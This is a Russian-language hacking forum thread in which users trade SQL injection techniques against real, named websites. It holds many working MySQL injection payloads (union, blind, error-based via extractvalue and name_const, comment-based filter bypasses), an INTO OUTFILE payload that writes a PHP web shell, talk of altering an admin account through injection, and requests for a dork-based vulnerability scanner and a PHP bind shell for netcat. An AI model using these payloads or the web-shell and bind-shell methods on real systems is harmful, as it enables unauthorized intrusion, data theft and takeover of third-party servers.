http://www.asiafuns.com/search_results.php?country=163+and+substring%28SELECT%20version%28%29,1,1%29=5+--+ select не фильтруется
Redwood, я понял. С шеллом не получилось. Но вот, что известно: Инъекция в числовом параметре есть: http://site.com/menu/show/121%20and%201=1/33/#main Результат: A Database Error Occurred Error Number: 1054 Unknown column '20and' in 'where clause' SELECT * FROM menu WHERE id=121%20and%201=1 Фильтруются пробелы, символы : ( , ) , /**/, + Можно ли раскрутить скуль в таком случае?
Это через программу? как бы я так понимаю я итак делаю post'om через браузер подзапросы не помогают, потому что фильтруются даже скобочки в самой url
Подзапросы, крутить как слепую, вывод в ошибке Code: sql.php?id=2+union+(select+1,2,table_name,4,5+from+information_schema.tables) and etc Code: sql.php?id=2+and+(select+ascii(substring((select+table_name+from+information_schema.tables+limit+0,1),1,1))+from+information_schema.tables+limit+0,1)>66 and etc Вывод через ошибку без использования Union Для Mysql 4.1>= Code: sql.php?id=2+and+(select+1+from+(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a) Code: sql.php?id=2+or+1+group+by+concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+having+min(0) Для Mysql 5.1>= Code: sql.php?id=2+and+extractvalue(1,concat(0x5c,((select+table_name+from+information_schema.tables+limit+0,1)))) Для Mysql 5.0.12 > 5.0.64 Code: sql.php?id=1+or+(1,2)=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),1),name_const((select+table_name+from+information_schema.tables+limit+0,1),1))a) Можно еще попробовать обойти так Code: sql.php?id=2+un/**/ion+se/**/lect+1,2,3,4,5 Code: sql.php?id=2+un/*%00*/ion+se/*%00*/lect+1,2,3,4,5 Code: sql.php?id=2/**/union/**/select/**/1,2,3,4,5 Code: sql.php?id=2+union+%0A+select+1,2,3,4,5 Вариантов куча, всего не перечислишь, думаю этого должно хватить
Кто знает софт(скрипт) который в гугл лезет по моему дорку, подставляет в URL ковычку и сайты где вышла ошибка передаёт мне?
Нашел вот такую вещь Code: id=1+limit+1+into+outfile+'/path/to/shell.php'+fields+terminated+by+''+optionally+encl osed+by+"<?php+system($_GET[c]);die();?>"--+ Что-то я не пойму откуда берется шелл чтобы залить его в /path/to/ ?
Привет подскажите плиз как оборвать запрос на данном сайте http://allkupchino.ru/miss/miss.phtml?n=46{SQL} http://allkupchino.ru/bbs/ob.phtml?nb=42{SQL} Если подставить (+; --+; /*) то результат не выводится, значит ошибка = (
Можно ли через sql inj внести изменения в колонку ДБ (допустим добавить/обновить юзера/хеш) ? Если это возможно приведите плз пример
Нет нельзя.Подумай сам если бы такое было возможно, то раздел рашифровки хешей был бы не нужен.А если по теме то почитай доки мускуля а в частности UNION+SELECT и UPDATE
PHP: UPDATE admin SET email='[email protected]' WHERE user_name='admin' обновит емайл юзера под ником "admin" , вроде как. Но как подметил Gorev , чаще всего это невозможно... не хватает прав.
Это невозможно всегда, дело не в правах а в синтаксисе мускуля (если говорим про данный оператор в иньекции) UPDATE после UNION SELECT не работает.
подскажите скриптец аналог bind.pl, но на пхп, то есть цель - забиндить порт средствами пхп с целью туда неткатом подключиться
